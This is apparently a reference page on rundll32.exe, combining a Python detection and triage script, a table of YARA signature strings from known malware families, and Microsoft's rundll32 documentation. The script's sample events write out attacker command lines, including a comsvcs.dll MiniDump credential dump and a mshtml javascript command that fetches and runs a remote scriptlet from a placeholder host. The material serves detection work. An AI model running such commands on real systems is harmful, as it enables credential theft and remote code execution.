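    severity = max((f[0] for f in findings), key=RANK.get, default="benign")
    return {"image": event["Image"], "module": module, "entry": entry,
            "args": args, "findings": findings, "severity": severity}


def triage(events):
    return [assess_event(e) for e in events]


SAMPLE_EVENTS = [  # constructed; command lines modelled on entries listed on this page
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 652 C:\Users\Public\svchost-exe.dmp full"},
    {"Image": r"C:\Windows\SysWOW64\drivers\Rundll32.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\drivers\Rundll32.exe" "C:\Windows\SysWOW64\drivers\wdigest.dll",SpInitialize'},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe Shell32.dll ShellExec_RunDLL cmd.exe /c mkdir SMRTNTKY\MessageB.txt"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://www.example.com/malicious.sct").Exec();'},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe "%PROGRAMDATA%\Winlogon\winlogon.lnk",DllGetClassObject host'},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe printui.dll,PrintUIEntry /in /n \\printsrv\HP-3rd-floor"},
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(f"{r['severity']:7} {r['module'] or '-'} , {r['entry']}  {[f[1] for f in r['findings']]}")
```

Ordinal calls and modules outside System32 are rated medium because legitimate software produces both; pair them with the parent process and the Authenticode or catalog signature state before alerting, which is also what the Sigma rule's false-positive notes ask for. A renamed copy of rundll32.exe (T1036.003 above) is not caught by the Image check alone; that needs the OriginalFileName field, which this example does not model.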
signature-base | apt_apt29_nobelium_may21.yar | $a1 = "rundll32.exe" wide | CC BY-NC 4.0 |
signature-base | apt_apt29_nobelium_may21.yar | $s2 = "rundll32.exe %s %s" ascii fullword | CC BY-NC 4.0 |
signature-base | apt_apt29_nobelium_may21.yar | $s1 = "rundll32.exe {0} {1}" wide fullword | CC BY-NC 4.0 |
signature-base | apt_apt41.yar | $s1 = "Rundll32.exe "%s", DisPlay 64" fullword ascii | CC BY-NC 4.0 |
signature-base | apt_codoso.yar | $s0 = "rundll32 "%s",%s" fullword ascii | CC BY-NC 4.0 |
signature-base | apt_codoso.yar | $s1 = "rundll32.exe "%s", RunMeByDLL32" fullword ascii | CC BY-NC 4.0 |
signature-base | apt_codoso.yar | $x2 = "rundll32.exe "%s", RunMeByDLL32" fullword ascii | CC BY-NC 4.0 |
signature-base | apt_derusbi.yar | $x4 = "rundll32.exe "%s", R32 %s" fullword wide | CC BY-NC 4.0 |
signature-base | apt_emissary.yar | $s3 = "rundll32.exe "%s",Setting" fullword ascii | CC BY-NC 4.0 |
signature-base | apt_freemilk.yar | $s4 = "outFile=sysDir&"\rundll32.exe"" fullword ascii | CC BY-NC 4.0 |
signature-base | apt_glassRAT.yar | // $bin2 = {34 02} // xor al, 2 --> XOR key for rundll32.exe | CC BY-NC 4.0 |
signature-base | apt_glassRAT.yar | $s1 = "pwlfnn10,gzg" // rundll32.exe XOR 02 | CC BY-NC 4.0 |
signature-base | apt_glassRAT.yar | $s6 = "rundll32 "%s",AddNum" fullword ascii | CC BY-NC 4.0 |
signature-base | apt_golddragon.yar | $x2 = "rundll32.exe %s RunningRat" fullword ascii | CC BY-NC 4.0 |
signature-base | apt_golddragon.yar | $x4 = "rundll32.exe %s ExportFunction" fullword ascii | CC BY-NC 4.0 |
signature-base | apt_golddragon.yar | $x5 = "rundll32.exe "%s" RunningRat" fullword ascii | CC BY-NC 4.0 |
signature-base | apt_golddragon.yar | $s5 = "rundll32.exe "%s" Run" fullword ascii | CC BY-NC 4.0 |
signature-base | apt_keyboys.yar | $s4 = "rundll32.exe %s Main" fullword ascii | CC BY-NC 4.0 |
signature-base | apt_keyboys.yar | $x1 = "rundll32.exe %s SSSS & exit" fullword ascii | CC BY-NC 4.0 |
signature-base | apt_keyboys.yar | $x1 = "%s\rundll32.exe %s ServiceTake %s %s" fullword ascii | CC BY-NC 4.0 |
signature-base | apt_khrat.yar | $x2 = "CreateObject("WScript.Shell").Run "rundll32.exe javascript:""\..\mshtml,RunHTMLApplication" ascii | CC BY-NC 4.0 |
signature-base | apt_korplug_fast.yar | $x1 = "%s\rundll32.exe "%s", ShadowPlay" fullword ascii | CC BY-NC 4.0 |
signature-base | apt_korplug_fast.yar | $s1 = "%s\rundll32.exe "%s"," fullword ascii | CC BY-NC 4.0 |
signature-base | apt_op_cloudhopper.yar | $s2 = "rundll32.exe "%s", UnInstall /update %s" fullword wide | CC BY-NC 4.0 |
signature-base | apt_rokrat.yar | $x3 = "outFile=sysDir&"\rundll32.exe"" fullword ascii | CC BY-NC 4.0 |
signature-base | apt_sakula.yar | $str02 = "cmd.exe /c rundll32 "%s" Play "%s"" | CC BY-NC 4.0 |
signature-base | apt_sakula.yar | $str08 = "cmd.exe /c rundll32 "%s" ActiveQvaw "%s"" | CC BY-NC 4.0 |
signature-base | apt_sofacy_oct17_camp.yar | $s1 = "start rundll32.exe %path %,#1a" fullword ascii | CC BY-NC 4.0 |
signature-base | apt_tidepool.yar | $s2 = "C:\Windows\System32\rundll32.exe" fullword wide | CC BY-NC 4.0 |
signature-base | apt_ua_hermetic_wiper.yar | $sx1 = "/c powershell -c "rundll32 C:\windows\system32\comsvcs.dll MiniDump" ascii wide | CC BY-NC 4.0 |
signature-base | apt_wildneutron.yar | $s0 = "rundll32.exe "%s",#1" fullword wide /* PEStudio Blacklist: strings */ /* score: '33.00' */ | CC BY-NC 4.0 |
signature-base | apt_wilted_tulip.yar | $s1 = "%s\system32\rundll32.exe" fullword wide | CC BY-NC 4.0 |
signature-base | apt_wilted_tulip.yar | $r1 = " | CC BY-NC 4.0 |
signature-base | apt_wilted_tulip.yar | $s2 = "%s\system32\rundll32.exe" fullword wide | CC BY-NC 4.0 |
signature-base | apt_wilted_tulip.yar | $s3 = "%s\SysWOW64\rundll32.exe" fullword wide | CC BY-NC 4.0 |
signature-base | apt_winnti.yar | $a9 = "\rundll32.exe" wide | CC BY-NC 4.0 |
signature-base | apt_winnti_burning_umbrella.yar | $s2 = "rundll32.exe %s,Startup" fullword ascii | CC BY-NC 4.0 |
signature-base | cn_pentestset_webshells.yar | $s3 = "$cmd="cmd /c rundll32.exe $path,install $openPort $activeStr";" fullword ascii /* PEStudio Blacklist: strings */ | CC BY-NC 4.0 |
signature-base | crime_badrabbit.yar | $s9 = "process call create "C:\Windows\System32\rundll32.exe" fullword wide | CC BY-NC 4.0 |
signature-base | crime_fireball.yar | $s2 = "rundll32.exe "%s",%s" fullword wide | CC BY-NC 4.0 |
signature-base | crime_fireball.yar | $s2 = "RunDll32.exe "" fullword wide | CC BY-NC 4.0 |
signature-base | crime_kriskynote.yar | $s1 = "rundll32 %s Check" fullword ascii | CC BY-NC 4.0 |
signature-base | crime_nopetya_jun17.yar | $x2 = "process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 " fullword wide | CC BY-NC 4.0 |
signature-base | crime_nopetya_jun17.yar | $x3 = "-d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1 " fullword wide | CC BY-NC 4.0 |
signature-base | crime_nopetya_jun17.yar | /* ,#1 ….. rundll32.exe */ | CC BY-NC 4.0 |
signature-base | generic_anomalies.yar | description = "Detects uncommon file size of rundll32.exe" | CC BY-NC 4.0 |
signature-base | generic_anomalies.yar | and filename == "rundll32.exe" | CC BY-NC 4.0 |
signature-base | gen_gen_cactustorch.yar | $x6 = "Dim binary : binary = "rundll32.exe"" fullword ascii | CC BY-NC 4.0 |
signature-base | gen_gen_cactustorch.yar | $s1 = "binary = "rundll32.exe"" fullword ascii | CC BY-NC 4.0 |
signature-base | gen_gen_cactustorch.yar | $s4 = "var binary = "rundll32.exe";" fullword ascii | CC BY-NC 4.0 |
signature-base | gen_malware_set_qa.yar | $s4 = "\sysnative\rundll32.exe" fullword ascii | CC BY-NC 4.0 |
signature-base | gen_powershdll.yar | $x1 = "rundll32 PowerShdll,main -f | CC BY-NC 4.0 |
signature-base | gen_powershdll.yar | $x3 = "rundll32 PowerShdll,main | CC BY-NC 4.0 |
signature-base | gen_rats_malwareconfig.yar | $s7 = "cmd.exe /c rundll32 "%s"" | CC BY-NC 4.0 |
signature-base | gen_url_persitence.yar | $file1 = /\x0a\x0d\s=[^\x0d](powershell|cmd|certutil|mshta|wscript|cscript|rundll32|wmic|regsvr32|msbuild)(.exe|)[^\x0d]{2,50}\x0d/ nocase | CC BY-NC 4.0 |
signature-base | yara_mixed_ext_vars.yar | description = "Tool used in Operation Cloud Hopper - pscp.exe cloaked as rundll32.exe" | CC BY-NC 4.0 |
signature-base | yara_mixed_ext_vars.yar | all of them and filename == "rundll32.exe" | CC BY-NC 4.0 |
Additional Info*
*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.
rundll32
Loads and runs 32-bit dynamic-link libraries (DLLs). There are no configurable settings for Rundll32. Help information is provided for a specific DLL you run with the rundll32 command.
You must run the rundll32 command from an elevated command prompt. To open an elevated command prompt, click Start, right-click Command Prompt, and then click Run as administrator.
Syntax
rundll32 <DLLname>
Parameters
Parameter | Description |
---|---|
Rundll32 printui.dll,PrintUIEntry | Displays the printer user interface. |
Remarks
Rundll32 can only call functions from a DLL explicitly written to be called by Rundll32.
Additional References
MIT License. Copyright (c) 2020-2021 Strontic.